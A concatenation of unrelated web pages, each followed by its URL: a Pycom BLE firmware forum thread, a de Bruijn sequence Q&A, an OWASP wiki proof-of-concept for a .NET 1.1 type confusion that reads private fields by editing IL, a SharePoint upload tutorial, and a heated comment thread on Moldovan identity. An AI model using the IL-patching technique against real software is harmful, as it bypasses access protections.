- jmarcelino last edited by

@brotherdust said in New firmware release 1.0.0.b1:

One thought that occurs to me: what are other MP boards doing for BT (the BBC micro:bit comes to mind)? Isn't it more pythonic to not reinvent the wheel?

The particular Nordic part used in the micro:bit didn't have enough RAM (16K) to run both MicroPython and the BLE stack, so they never implemented it. They only support wired (!) networking and a simple proprietary radio protocol from Nordic. So here we have a chance to be true pioneers.

- brotherdust last edited by

One thought that occurs to me: what are other MP boards doing for BT (the BBC micro:bit comes to mind)? Isn't it more pythonic to not reinvent the wheel?
- jmarcelino last edited by

@daniel The cb (CoreBluetooth) module in Pythonista could give some inspiration as well.

- brotherdust last edited by

@jasonriedy I've been keeping an eye on the implementation status of the ULP coprocessor functions in the upstream espressif-idf repository. Espressif has been making progress on it, but it doesn't seem like it's ready yet. Pycom did mention they updated their downstream idf repo, which means the ULP functions are present in C; but I didn't see any mention of ULP functions for MicroPython yet. Likely we will see them in the near future. For those interested, I'd strongly suggest occasionally reviewing the commit log on the upstream espressif-idf. It's pretty fun to watch!

@daniel I suggest you take a look at CurieBLE's API as well (). It's related to Intel's IoT-enabled MCU you can find on the Arduino/Genuino 101. I have used it for a BLE project and it did the job quite beautifully.

@daniel They're hive sensors from Broodminder. The sensor pipes up every few seconds, but we likely only need the measurements every 10-15 minutes. Assuming that dropping to low power / standby during that time can be made to work... Otherwise we might just gather all the data but only send it every longish while. The actual processing is minimal. We just need to re-arrange the bytes into a packet to send off to TTN.

Reinstalling the installer app every time is a bit annoying. Is it possible to have a direct link to a firmware file on the web site? Or at least please make an OTA version that does not require an install.

PS: I've updated to the last firmware; machine.freq() is 160MHz now instead of 80. Magic :)

@jasonriedy and @jmarcelino I think you both have very good ideas around what the BLE API should look like. I'd love to hear your suggestions around that. We have also been looking at bluepy for inspiration.
Cheers,
Daniel

@jasonriedy right now the scan function only provides a list of the devices advertising in the neighborhood, so it makes sense to see only one entry in your tests. The next step (and it's what we will release soon) is to subscribe to a given device and get each of the advertisement messages that it sends.

Cheers,
Daniel
https://forum.pycom.io/topic/373/new-firmware-release-1-0-0-b1
The shortest string containing all given substrings

I found a problem from... . An English translation goes like this: A person wants to learn to play the tuba. His neighbours get angry about the noise, so he tries to find a song that contains as few tunes as possible while containing all combinations of four or fewer tunes that he is able to play. The tunes are c, d, e, f, g, a, and h. Output the minimal song.

I tried a code from... .

def de_bruijn(k, n):
    """
    de Bruijn sequence for alphabet k
    and subsequences of length n.
    """
    alphabet = k
    k = len(k)
    a = [0] * k * n
    sequence = []
    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(alphabet[i] for i in sequence)

seq = de_bruijn("cdefgah", 4)
print(seq)

But the validator on the site says that hccc is missing. So, how can I use Sagemath to solve the problem: if a set contains the letters a, c, d, e, f, g, h, how do I find the shortest string containing all substrings of length one to four?

If you want a Sagemath solution, there is.... You would have to translate the numbers 1, 2, ..., 7 to the letters a, c, d, ... h, but that should be easy.
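For completeness: the missing "hccc" comes from the fact that a de Bruijn sequence is cyclic, while the validator checks a flat string. A sketch of a fix (reusing the same construction as in the question) is to append the first n-1 characters, so windows that wrap around the cycle also appear:

```python
def de_bruijn(alphabet, n):
    """Cyclic de Bruijn sequence over `alphabet` for windows of length n."""
    k = len(alphabet)
    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)

tunes = "cdefgah"
n = 4
cyclic = de_bruijn(tunes, n)    # length 7**4 = 2401
song = cyclic + cyclic[:n - 1]  # linearize: length 2404

# Every combination of 4 tunes is now a substring, and therefore every
# shorter combination as well (each is a prefix of some 4-tune window).
```

This is also minimal: any string containing all 2401 four-letter combinations has at least 2401 four-letter windows, hence length at least 2401 + 3 = 2404, which the linearized sequence achieves.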
https://ask.sagemath.org/question/47438/the-shortest-string-containing-all-given-substrings/
Possible Type Confusion issue in .Net 1.1 (only works in Full Trust)

Revision as of 19:28, 24 July 2006

While doing my Rooting the CLR research I found something which I think could be a 'Type Confusion issue' in .Net 1.1 (see more details about these issues in this great document on Java Security published by the LSD Research group).

Here is my test:

1) Compile this:

using System;

namespace RootingTheClr
{
  class classTest
  {
    public static void Main()
    {
      Console.WriteLine("\n\n classTest \n\n");
      normalClass ncTest = new normalClass();
      maliciousClass mcTest = (maliciousClass)new maliciousClass();
      normalClass ncTestTarget = ncTest;
      Console.WriteLine("Public = " + mcTest.iPublicVar + " Private = " + mcTest.iPrivateVar );
    }
  }

  class normalClass
  {
    public int iPublicVar;
    private int iPrivateVar;

    public normalClass()
    {
      iPrivateVar = 100;
      iPublicVar = 999;
    }
  }

  class maliciousClass
  {
    public int iPublicVar;
    public int iPrivateVar;

    public maliciousClass()
    {
      iPrivateVar = 1;
      iPublicVar = 9;
    }
  }
}

2) and you should get this (note the value of Private):

csc classtest.cs
Microsoft (R) Visual C# .NET Compiler version 7.10.3052.4 for Microsoft (R) .NET Framework version 1.1.4322
Copyright (C) Microsoft Corporation 2001-2002. All rights reserved.
classTest.cs(21,15): warning CS0169: The private field 'RootingTheClr.normalClass.iPrivateVar' is never used

classTest.exe

classTest

Public = 9 Private = 1

3) Run ILDASM on the exe:

ildasm classTest.exe /out:classTest.il
// WARNING: Created Win32 resource file classTest.res

4) Notepad it and make this change:

notepad classTest.il

replace

IL_0010: newobj instance void RootingTheClr.maliciousClass::.ctor()

with

IL_0010: newobj instance void RootingTheClr.normalClass::.ctor()

5) Ilasm the file:

ilasm classTest.il
Microsoft (R) .NET Framework IL Assembler. Version 1.1.4322.573
Copyright (C) Microsoft Corporation 1998-2002. All rights reserved.
Assembling 'classTest.il' , no listing file, to EXE --> 'classTest.EXE'
Source file is ANSI

Assembled method classTest::Main
Assembled method classTest::.ctor
Assembled method normalClass::.ctor
Assembled method maliciousClass::.ctor
Creating PE file

Emitting members:
Global
Class 1 Methods: 2;
Class 2 Fields: 2; Methods: 1;
Class 3 Fields: 2; Methods: 1;
Resolving member refs: 8 -> 8 defs, 0 refs
Writing PE file
Operation completed successfully

6) Execute it (note the value of Private):

classTest.exe

classTest

Public = 999 Private = 100

7) This means that we successfully were able to cast an object of the class normalClass into an object of the class maliciousClass. The attack vector occurs because iPrivateVar is a public var in maliciousClass and a private var in normalClass:

class maliciousClass
{
  public int iPublicVar;
  public int iPrivateVar;
  ...

class normalClass
{
  public int iPublicVar;
  private int iPrivateVar;
  ...

8) What is interesting is that this only works in Full Trust. If you try to run this in a partial trust environment (like from a local network share) you will get the following error:

classTest.exe

Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime.
   at RootingTheClr.classTest.Main()

This means that the CLR in partial trust does do some verification on the compiled byte code which is not done in Full Trust (which will mean that the Microsoft Security Response Team will say that this is not a vulnerability and occurs by design :)
https://www.owasp.org/index.php?title=Possible_Type_Confusion_issue_in_.Net_1.1_(only_works_in_Full_Trust)&diff=8057&oldid=7566
Upload file to SharePoint library using File Control and PnP JS in SPFx webpart

In this article, we will learn how to upload files to a SharePoint library using a file control and PnP JS in SPFx web parts.

Pre-requisites – You have created an SPFx web part and selected the React framework. Please note that this can also be done with no JavaScript framework or with Vue.js; the only difference would be how you render your input control and get the context. That is a different story.

We will use the SP PnP JS library module for the SPFx web part. Install it in your SPFx solution using the below command:

npm install @pnp/sp --save

Add the import statement in the webpartcomponent.tsx file:

import { sp } from "@pnp/sp";

Below should be your render method:

public render(): React.ReactElement<ISpFxWebCamProps> {
  return (
    <div className={ styles.maincontainer }>
      <input type="file" ref={(elm) => { this._input = elm; }}></input>
      <p>
        <button onClick={() => this.uploadFileFromControl()} > Upload </button>
      </p>
    </div>
  );
}

Add our uploadFileFromControl method; please note that here MyDocs is the library name.

private uploadFileFromControl(){
  // Get the file from the file input DOM element
  var files = this._input.files;
  var file = files[0];
  // Upload the file to the SharePoint library
  sp.web.getFolderByServerRelativeUrl(this.props.context.pageContext.web.serverRelativeUrl + "/MyDocs")
    .files.add(file.name, file, true)
    .then((data) =>{
      alert("File uploaded successfully");
    })
    .catch((error) =>{
      alert("Error in uploading");
    });
}

That's it; let us test this out. Run gulp serve and browse workbench.aspx from your SharePoint site. Select a file and click on upload.

Let's go to the library to check if the document was uploaded.

Thanks for reading. Happy coding!
clarify the language issue: calling the Moldovan language Romanian is like calling the English language American! The Moldovan state and the Moldovan language have existed since the 14th century; on the other hand, the term 'Romanian' only appeared in the 19th century... I would like to kindly ask Romanians to stop interfering in our life in Moldova. It is not your land and no one wants you here.

1 There's no logic in what you're saying. 2 Stop discussing the language stuff, there have already been like 50% of the comments on the article about this. Reply to the other threads.

Moldova is simply part of the territory of Romania grabbed by Stalin as a result of the 1939 Molotov-Ribbentrop Pact and confirmed in the Yalta and Potsdam agreements as part of buying Stalin's participation in the war against Hitler. What didn't help the Romanians was that they became Hitler's allies after Stalin's land grab. Nobody asked the Moldovans whether they wanted to be separated from Romania, their historic country. Moldovan as a language is simply Romanian with a dollop of post-1945 Russian/Ukrainian which came in on the back of occupying Red Army units and Soviet Russian officials.

No one asked the Moldovan people if they wanted to be separated from the dying Russian Empire in 1918: there was no referendum, and the Council (Sfatul Tarii) that voted the Union was created simply by a conference of the Moldovan soldiers. The vote for Union in the Council took place once the Romanian Army had already occupied Chisinau. So, please, stop presenting the history as if it started in the 1920s: Moldova was part of Romania for only 20 years. All the borders of Europe have changed many times, and if we start claiming former territories there will be a really big mess. It's time to start improving the situation of the State, not dreaming about Russia, the USSR or Romania. And stop speaking about the name of the language: calling it Romanian or Moldovan doesn't change anything in the economic development of the country.
Use your time to elaborate a valid economic strategy!

I'm sorry - what book of history did you use in high school? What about Mihai Viteazu? What about Alexandru Ioan Cuza? As for the valid economic strategy, there will be none till the people take more interest in the decision-making process! Here nobody cares to step up and fight for justice as a citizen - we always expect someone else to do it!

With this argument in mind, in 1812, when the Ottoman Empire gave Basarabia (Republic of Moldova) away to the Russian Empire, the Moldovans were not asked either. Also, the Moldovan people did not seem to protest and complain about the Romanian 'occupation', and it was probably the last period this region thrived. More, most recently Basarabia (Republic of Moldova) was part of Romania from 1918 to 1940 and then from 1941 to 1944, so it's a bit more than 20 years. As for the language, people are just stating the obvious. And it is not our job to come up with an economic strategy for Moldova; usually that is what the government and parliament are for!!

You cannot go back to the Middle Ages with Mihai Viteazu: that was a patrimonial State, not a nation state; it doesn't have any impact on today's history, it's just a distant memory. And as regards Cuza, when he became ruler of the two principalities, Bessarabia was already part of the Russian Empire. I just wanted to say that it's time to stop dreaming about solving the problems by becoming part of another entity. As regards the second sentence, I agree with you, I lived in Moldova: if people don't fight as citizens, they cannot improve the situation, but if the intellectuals don't consider the State a legitimate one, how can they expect the people to fight for it? I don't want to say that people were asked if they wanted to be part of the Russian Empire; my argument is that the borders should not be put into question today, or it will create problems for all of Europe (do you want to give back Transilvania to Hungary?)
and the solution should be found inside the country. I'm sorry, but the direction of the economic development of a country is the result of elaboration by society and intellectuals; politicians then interpret it through parties and apply it. Thinking that this is solely a duty of the government is quite Soviet in style...

Fine, I can see your point about the borders, but I don't think you should have given Romania as an example of occupiers when the Russians did what they did to Moldova. Soviet, you say? I don't think so; I think it's more realistic. Unfortunately, the politicians are the ones that control the economic strategies, for better or for worse. The society, and even more the intellectuals, have almost no say in this. What you say is correct, but this principle is not really applied in most countries, including Moldova.

Imperial Russia in its post-1612 expansion swallowed many peoples, nations and indeed states. Since 1989 the process has at last been reversed. Hopefully permanently! Moldova and Bessarabia are just two of many parts of Eurasia that were forced to become constituent parts of the Russian Empire (White and Red). Historically both were medieval core regions of modern Romania. The native inhabitants (not imported inhabitants) of such regions should be allowed to freely choose the State they wish to belong to. If Moldovans wish to join Romania, then, provided Romanians themselves approve of such a unification, they should be allowed to do so. As to "parachuted" Russians, they should either fully integrate or leave.

The Moldovan language does not exist; it is not merely similar to Romanian, it is exactly the same language!

Just a small comment: the 'Moldovan' language is in fact Romanian; its designation as an official language is made solely for political reasons. Linguistically, the small differences in accent or lexicon would perhaps not even qualify it as a dialect.

Not a success story yet - but it is going there. And with Romania's help too.
However, by mentioning the existence of a "similar" Moldovan language, The Economist only helps promote the old Stalinist ideology of two different languages and cultures (Romanian and Moldovan) upheld today by groups whose desire is not to join the EU someday, but to be a part of a new pseudo-Soviet Empire like the Eurasian Union. I hope and believe your newspaper does not endorse such a path for Moldova...

The Trans-Dniester story is just an excuse. On both sides. Look at Cyprus, for example. Turkish army present. Moldova has far more problems than just Transnistria. And slogans like "Moldova changed for the better"? It's a myth. Never in its recent history was my country in such a bad, desperate condition. People are hopeless. And not much will change in the near future. GDP? We produce nearly nothing. All our economy is based on remittances from emigrants. Tax revenue comes from the service sector. The worst thing is that the present political parties build their credentials on false promises, mostly about visas to the EU and integration into the EU. As for Moldovans and Romanians: we share the same language. We share a great deal of history, but we are different. And not different like Cyprus and Greece. We are different nations. The last century made a big difference. And over 75% of the population consider themselves Moldovans. Not Romanians. Because we are not. And about the change? When we are able to get rid of corruption, we can say that something has changed. But every one of us has to change. When the first dirty official goes to jail on a corruption charge, then there will be some change. And that will not happen. Not in the near future. It's sad. Very sad, but this is the hard truth.

Moldovans and Romanians are not different nations. At least not from my point of view. Moldova is a historical region that is now split between Romania, Ukraine and the actual Republic of Moldova.
In a sense, those on the west side of the Prut river are just as Moldovan as we are, and we are just as Romanian as they.

Tell that to the Moldovans from Iasi. I also advise you to visit Romania and see the 'olteni', 'maramureseni', etc. to give you a bit of flavor of what 'Romanian' includes. But what can you do - 50 years of brainwashing in the USSR will not disappear too fast.

Looks like a PLDM member wrote the article. Pretty fair though.

Actually you're wrong, no PLDM, never; this party works just for its own interests. I agree that Moldova is not yet a member of the European Union and we need to have a realistic approach, but this doesn't mean that in the next 10 years the situation is going to be the same. Of course in Moldova there is still a strong geopolitical influence from Russia, but the direction chosen by Moldova is a good one, I mean the European direction of promoting EU values. Being one of the poorest countries in Europe doesn't change the situation, because in a small country like Moldova it is much easier to achieve good economic growth... I also want to say that I prefer the European approach of promoting democracy to the US model ;)

Moldova is unfortunately far from a success story. It is the poorest country in Europe, almost a quarter of Moldovans have left to work in Europe, and corruption and communism are still deeply rooted in Moldovan society. More, it is a socially and culturally split country (people support either Europe/Romania, with whom they share their history and language, or Russia/the Eurasian Union) and it is still dominated and brainwashed by Russian propaganda that tries to turn them away from Europe and make them join the Eurasian Union (some kind of modern USSR, if you ask me). I hope for the best (Europe) for Moldova but it will be a feat very hard to achieve. Oh, and there is no such thing as Moldovan, even though their (communist) constitution says so. Literary 'Moldovan' and Romanian are identical.
Moldova isn't merely one of the poorest places in Europe - it is by far the poorest place in Europe. Here's a comprehensive list of all the European countries with a lower 2011 nominal GDP per capita than South Africa ($8,070):

Montenegro ----- $7,197
Bulgaria ------- $7,158 (the only EU country in this category - and it probably won't be there for long)
Azerbaijan ----- $6,916
Serbia --------- $6,203
Belarus -------- $5,820 (suspect numbers - no honest stats)
Macedonia ------ $4,925
Bosnia --------- $4,821
Albania -------- $4,030
Ukraine -------- $3,615
Kosovo --------- $3,593
Armenia -------- $3,305
Georgia -------- $3,203
Moldova -------- $1,967

Moldova is so much poorer than anywhere else in Europe that it really wouldn't look out of place in Sub-Saharan Africa (at least going by GDP stats - obviously, as with the rest of Europe, social indicators like education, health or life expectancy are far better than GDP would suggest). There is no sense in which Moldova can be described as a success story - not yet.

On the bright side, Moldova's GDP per capita (euro-denominated) has grown 90% in the past 5 years; its PPP GDP per capita has grown 32%. So the country is making progress from a horrifically low base. Moldova also stands out against Russia, Belarus or Azerbaijan as a place that seems to have more genuine aspirations for integrating with Western norms, safeguarding human & civil rights and chasing long-term prosperity. Aspirations are great - but we can't call it a success story until there has been far more progress in this direction.

Shaun, Moldova has two basic economic problems: the lack of good road connections to places westward in Europe - and the lack of independent, national energy sources. Both of these could be solved relatively easily by the EU, if we were not so damned occupied with the Euro-crisis.
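As an aside, the five-year growth figures quoted above are easier to compare when annualized. A quick sketch (the 90% and 32% inputs just restate the comment's numbers; the compound-growth formula is standard):

```typescript
// Convert total growth over n years to a compound annual growth rate.
function annualizedRate(totalGrowth: number, years: number): number {
  return Math.pow(1 + totalGrowth, 1 / years) - 1;
}

// 90% nominal growth over 5 years is roughly 13.7% per year
console.log(annualizedRate(0.90, 5).toFixed(3)); // "0.137"
// 32% PPP growth over 5 years is roughly 5.7% per year
console.log(annualizedRate(0.32, 5).toFixed(3)); // "0.057"
```

So even the "bright side" numbers imply double-digit nominal but only mid-single-digit real annual growth, consistent with the "progress from a horrifically low base" reading.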
Of the five million foreigners now resident in Italy, one million are Romanians, 225,000 Ukrainians and 140,000 are Moldovans, who are the seventh-largest immigrant group in Italy and the fastest growing (together with the Romanians). Absorbing such a large number of Romanians and Roma has not been without difficulties. Many immigrants are furious over the low wages being paid here. But my sense is that the integration will improve over time and has become a fairly permanent phenomenon. And there is no particular prejudice against Moldovans per se (although all foreigners have their complaints). I think Moldova is one of those small places that Italians like to invest in - a bit under the German radar, so to speak. But there can be no doubt, I think, that the real problem is restoring Romania's economy to solid growth through solid consumer confidence...

Consumer confidence has a part to play; general business investment (for raising both productivity and exports) is even more important (in the case of Romania). Are there many businesses (established or new; domestic or international) which can see opportunities to invest in Romania and beat the local competition in terms of productivity? Consumer confidence (current spending levels) is only ever a very short-run problem. It is underlying productivity and capacities that really matter for long-run, sustained prosperity.

"Of the five million foreigners now resident in Italy, one million are Romanians, 225,000 Ukrainians and 140,000 are Moldovans." I assume that the rest must be immigrants from North Africa?

@ Milovan/Joe: "I think Moldova is one of those small places that Italians like to invest in - a bit under the German radar, so to speak"
Too late: (22. 08. 2012) These Barbarians!

Gee Josh. Angela Merkel visited Moldova. That's nice.
A series of videos from the Italy-Moldova website, including "Moldova seen from Italy":

1) Romania - 1,000,000
2) Albania - 490,000
3) Morocco - 460,000
4) China - 230,000 (many from Hong Kong)
5) Ukraine - 225,000
6) Philippines - 140,000 (many are members of the Catholic clergy)
7) Moldova - 140,000
8) India - 125,000
9) Poland - 110,000
10) Tunisia - 105,000
11) Perù - 100,000
12) Ecuador - 95,000
13) Egypt - 90,000
14) Macedonia - 90,000
15) Bangladesh - 85,000

We also have many dual citizens from the US, Canada, Argentina, Chile, Brazil and Uruguay, as well as Colombia (named for Columbus) and Venezuela (named for Venice), not included in these numbers. Although Italy has long been not a very receptive country for immigrants (being mostly a source of emigration itself for many decades), the reality is changing - especially as Italians themselves make almost no babies. Upwards of one-third to one-half of babies born here are now non-Italian or only half-Italian by blood.

A little anecdote, perhaps apocryphal: I was recently asked by a 70-year-old friend - given that I speak English - to help her track down a nephew living in the US. This friend's brother had married a Moroccan woman 25 years ago. He had a child by this woman - but she turned out to be fairly dishonest. After a few years of life together, she stole 15,000 euros from his bank account and went back with her child to Morocco. They did not ever speak again, although the Italian family heard that she had later moved with her son to the US. The father (brother to my friend) died recently. Like most Italians of 70, he had three houses (worth probably €500,000 together), land, and cash savings in the bank of 400,000. The man's family despised his former wife - but the son was a different matter. Unless he were to demonstrate bad faith, the Italian family was well-disposed toward him - and went through great trouble (also with my assistance) to track him down in the US.
At one point, they also hired a private investigator in New York... the son was found, basically penniless and behind on his rent. He was informed that the inheritance, free of any debt/liens, was waiting for him in Italy. Last I heard, he had moved to Italy and was filing for citizenship (his right, under the law) to adopt a new life.

@ Milovan/Joe: Did you notice the odd post-communist marching band they sent across the tarmac (second half of clip)? Quite funny!

You are late Joe Milovan. Twice late :)...

"You are late Joe Milovan. Twice late :)" Says who? From the middle of the 13th century to the middle of the 15th century, the Black Sea was a Genoese lake - our navies commanded the Black Sea from Constantinople, Crimea, Trebizond, Sochi - and the Moldavian towns that we called Licostomo (Chilia Noua), Moncastro (Cetatea Alba or Bilhorod Dnistrovskiy) and Caladda (Galati). This economic system was lost with the Fall of Constantinople in 1453 and the successive conquest of Caffa in the Crimea by the Turks. The Genoese of Caffa, with the city bankrupt after wars with Venice, the Ottoman Turks and the Aragonese, asked Polish King Kazimierz to accept vassalage over Caffa in 1462. Also, the Kingdom of Sardinia used its lordship of Genoa - and the city's historic ties to the Black Sea - as a pretext to participate in the Crimean War in 1854, sending 18,000 troops to flank the Ottomans, French and British against the Russians. This was the famous incident in which Conte Camillo Benso di Cavour used Turin's place at the victory table to plead the cause of Italian unity - and convince France and the UK that a resurgent Italy under the House of Savoy would be a good ally for the western powers.

A bit more seriously... There is a lot of attention in Italy to Poland - both economically and politically. Yes, Poland's Ostpolitik is well known. I personally am a great supporter - as are many others here.
Unfortunately, Silvio Berlusconi personalised our Republic's relations with Russia - to the not very minor annoyance of the Romanians (and probably the Moldovans as well). So, no help from Rome regarding areas east of the Bug River. This must change soon. Time for our navy to head back into the Black Sea. The Americans are leaving, the French are selling capital ships to the Russians, and Bulgaria and Romania are representing NATO in the Black Sea, together with the Turks - who are not yet in the EU... I think our ships should be travelling to the Romanian coast. Plus, our navy has put up 20 ships for sale - possibly to the Philippines or Perù. These include a number of small destroyers originally commissioned by and built for Saddam Hussein in the 80's (and never delivered). So, why can't a small price be paid by NATO to purchase these ships from Italy and transfer them to our Black Sea allies? Time to start acting as though the EU cares about the Balkans and the Black Sea again...

Joe Milovan, nothing against what you call Genoese colonies, as they were simply ports and very supportive of local economies, not just of the profits of their operators. Good job! However, knowing you so well by now :-) I am afraid that you'd like to blur a little bit the otherwise sharp difference between Genoese economic influence and the general meaning of the word 'colony' :) Which is counterproductive, since the old Genoese, at least in Poland, are looked at as clever merchants, and not the loot-type classical colonialists. Also, I am afraid that you will tend to overlook the fact that Genoa never managed to actually move inland, because she was solely a sea power, not a land power.
In my mind, an example of what happens when a major land power's interests turn to the sea, and on the route to the sea stands a sea power without landmass roots, is what happened at the end of the 14th century in Dalmatia - Hungary wanted access to the sea and got it, winning it from the Republic of Venice (cf. the Treaty of Zadar). Btw, I thought that as a committed local patriot you'd side with the Republic of Venice, not the Republic of Genoa?

As to present times - we almost completely agree. Nonetheless your plan is not quite clear to me. When you write "why can't a small price be paid by NATO to purchase these ships from Italy and transfer them to our Black Sea allies?", what do you mean? Who is to pay the small price? Isn't Italy a NATO member?? Or do you mean that all of the NATO countries should actually pay a small price to Italy to enable Italy to send her ships to the Black Sea? Also, I am not sure what you mean when you say "time to start acting as though the EU cares about the Balkans". Isn't Italy an old-EU, rich, affluent country, living in peace and democracy for almost 70 years, an outpost to the Balkans? Why not simply act: provide technical and other support, including informative support, and on the other hand provide arguments understandable by other EU members for why the Balkan direction is so important. Why is Italy not doing that? Instead, all I read - here :-) - from you is how Italy longs for French military leadership and how she is ready to support the French 'North African' vector of the EU. France will manage without your support; why not start acting in YOUR region of interest? P.S. This is a friendly comment. (As all mine :) I hope you are better now and won't react as if I bit you.

1) NATO has a small budget and spends money especially to help its poorer members.
Italy's navy looks a bit larger and better than it is in reality, because we are keeping afloat many older ships that hardly ever leave port and should be retired - but we also receive a certain amount of money for each ship in the navy, like all member states (did you know this?). So, the 20 ships we are putting up for sale might fetch 150-200 million in all. Not so much that we are willing to give them away without getting some cash in return (to continue the new shipbuilding programme this year), but small enough for NATO to make a contribution to keeping those ships in Europe (which would double the effective firepower of the Romanian and Bulgarian navies).

2) As a former defeated country from WWII - having signed an agreement with our victors, the US, Russia, France and the UK, not ever to acquire nuclear, chemical or biological weapons, plus other restrictions - we have no precedent for military action of our own. Therefore, we move only when led by one of the victors. Of these conquering powers, there is no question that we are closest to the French people by language and history. They have already governed ample parts of Italy in the past - and Napoleon and Garibaldi unite France and Italy. Remember, Pilsudski may have been born in Lithuania, but Garibaldi was born and died a French citizen. Nor should we forget the Armée des Vosges from the Franco-Prussian War: 2,000 volunteer Genoese Carabinieri led by Garibaldi, entrusted by the government of the Republic to defend France - the only victorious French army of the war and the only army to capture a Prussian battle-flag (61st Pomeranian Regiment).

3) "Classic colonialism"? You mean what colonialism became under the English and other nation-states? Genoa invented modern colonialism, and that colonialism was hardly JUST "mercantile". The Genoese colonies financed all the local kingdoms in those years - including the crown of England, from the colony in Southampton.
Genoese colonies everywhere were superior in military strength and technology than the armies of the local kingdoms - that is why they survived so long. Genoese Crimea resisted many attempts at conquest - including siege by powerful Mongol armies. And they did spread inland - but when they did, they tended to marry with local women and slowly assimilate. "There were some 33,000 descendants of the Genoese colonists in Istanbul and Izmir in 1933." " Some Italian descendants still existed in Crimea in the early 20th century, and were among the ethnic groups suppressed by Joseph Stalin.[6] The fall of the eastern colonies caused a deep economical crisis which eventually turned in an unstoppable decline for the Republic of Genoa as a major European power.[7] While its longtime rival, the Republic of Venice, was able to maintain some continuity between the capital and its eastern possession, Genoa could not. It thus moved its interests in the western Mediterranean, establishing flourishing communities in Cadiz and Lisbon. Genoa, in particular, became an efficient banking base of Spain." (Wikipedia). As a result, as recently as 1892, one half of all Italians in the New World, from Alaska to Tierra del Fuego, were Genoese - we founded all the colonies of Italians in the West. And the Genoese became the backbone of the middle classes throughout Spanish-speaking South America (the Venetians instead moved into Brazil). Compare the most common surnames in Genoa with the telephone directories of all South America's major cities - there are an amazing number of Genoese descendants in the continent. You underestimate our role in history. There were five historical strands of finance/banking in Genoa: The sovereign debt financier - the Bank of Saint George (Banco di San Giorgio); Napoleon looted this bank in 1805 to form today's central Bank of France. 
The Catholic charity bank for the poor - the Savings Bank of Genoa: one of the oldest banks in the world, founded in 1483 by the monk "Brother Angelo from Chivasso"; they are still doing quite fine in the midst of the current international crisis, and have risen to become Italy's sixth-largest bank.

The private-sector bank of Genoese immigrants - Bank of America in San Francisco - which founded the Banca d'America e d'Italia in the peninsula in 1919. This institution was not only the world's largest bank for half a century, but was also the largest financial institution remaining with branch networks in both North America and Europe in 1945. Thus the United States government used this bank to transfer the Marshall Plan money to western Europe after the war. Italy's largest private bank was acquired by Deutsche Bank in 1986 as the German bank's first big international expansion - the division has been Deutsche Bank's most solid subsidiary since then.

Banca di Genova was the bank of the city's port, steel-making, shipbuilding and military industries, sponsored mostly by the Savoyard government in the 1800's to finance expansion of the economy of the Kingdom of Sardinia. BTW, this bank was most involved in dragging Italy into WWI, for business reasons. The Banca di Genova, founded in 1870, became Credito Italiano in 1901. Credito Italiano acquired the Credito Romagnolo Bank (itself founded in 1473) in 1995 and became Unicredito Italiano in 1998, later becoming Unicredit. (They bought Bank Pekao in 1999.) They are now not only second-largest in Poland, Romania and Slovenia, but also the largest bank in Italy, Austria, Slovakia and Bavaria (and third-largest in all of Germany).

Finally, there was the public Mint of Genoa, which stamped the Lira coins from 1138 to 1814. In 1815 the coins became the Sardinian Lira (and the Italian Lira in 1861, which in 2002 became the Euro).
The Mint became known as the Banca di Genova, which in 1849 became the Banca Nazionale degli Stati Sardi, with the sole power to print banknotes in the Kingdom of Sardinia. This became the National Bank of the Kingdom of Italy in 1867, which assumed the name "Banca d'Italia" in 1893 (Italy's central bank today).

Ok, got it, Joe Milovan. All NATO members should produce that little 150-200 million for Italy, so she can put the outdated junk on the Black Sea to secure Italian interests in the Balkans.

Your knowledge of history is excellent, but I would like to point out that:
1) There was no "Muslim Kingdom of Andalusia"; there was the Emirate of Granada (Imarat Gharnatah), also known as the Nasrid Kingdom of Granada.
2) Your references to "Spain" are misleading. "Spain" did not exist at that time, no more than "Italy". They were purely geographical references. Only after 1516-17, after Charles I of Habsburg inherited the Crowns of Castile and Aragon and went to the Peninsula, can the name Spain be used, and even then Castile, Aragon, Catalonia, Valencia, etc. retained their own laws and parliaments.
3) There was not a "Spanish flag". The flag taken to the New World by Christopher Columbus was that of the Crown of Castile. In spite of the purely dynastic union between King Ferdinand II of Aragon and Queen Isabella I of Castile, the Aragonese weren't allowed to participate in the New World enterprise, which was a Castilian monopoly.

A few comments: Yes, the Genoese and the Catalano-Aragonese kept screwing each other for a long time. Romeo might have been a Catalan and Juliet a Genoese... It's remarkable that even in South America the Genoese and the Venetians kept their original geographical locations, the latter in the east and the southeast and the former in the west and the south.

"- we founded all the colonies of Italians in the West." We? You (thou) must be very old, Milovan... ;-)

Hello Sir!
Good points - it is a bit difficult writing about historical events using contemporary words. Even more so in a few lines on a blog - and not an historical research paper at a university ;-)

Good point about the name of the Muslim Iberian state - thanks for the clarification. I was attempting to refer to the lands today called "Spain". Yes, of course - there was no Spain in 1492, amply demonstrated by the story of Isabella supporting Columbus (it would seem the Aragonese King Ferdinand was not entirely supportive - but perhaps his tacit approval was necessary for other reasons). In Italy it is said that Columbus was a lover of Isabella - and convinced her thusly. I suspect the reasons had more to do with maintaining a balance of power between Aragon and Castile. Thanks for the info - I had completely forgotten that Columbus sailed under the CASTILIAN (and not Aragonese) flag. Since we tend to use "Castellano" as synonymous with the "Spanish" language today, I had forgotten the distinction. So in other words, the Genoese families of Seville (Soziglia in our language) were able to make an alliance with Castile against Aragon, even as the two were marrying. I had not realised it went that far...

Essentially, the Venetians were kept out of South American development. What happened was that Genoese capital took advantage of the city's prominence during/after the Risorgimento to shut down the Venetian shipbuilding industry (the "Arsenale"). The decision to transform Venice into a tourist haven was made by a Genoese-influenced central government in the late 1800's - over the heads of the Venetians themselves. This story is a major factor behind the rise of the separatist Northern League today. On the other hand, as I sometimes like to point out, the Genoese lobby perhaps did the right thing for the wrong reason. The attempts by the Christian Democrats in the 1950's to create chemical factories in Venice/Marghera were a horrendous mistake.
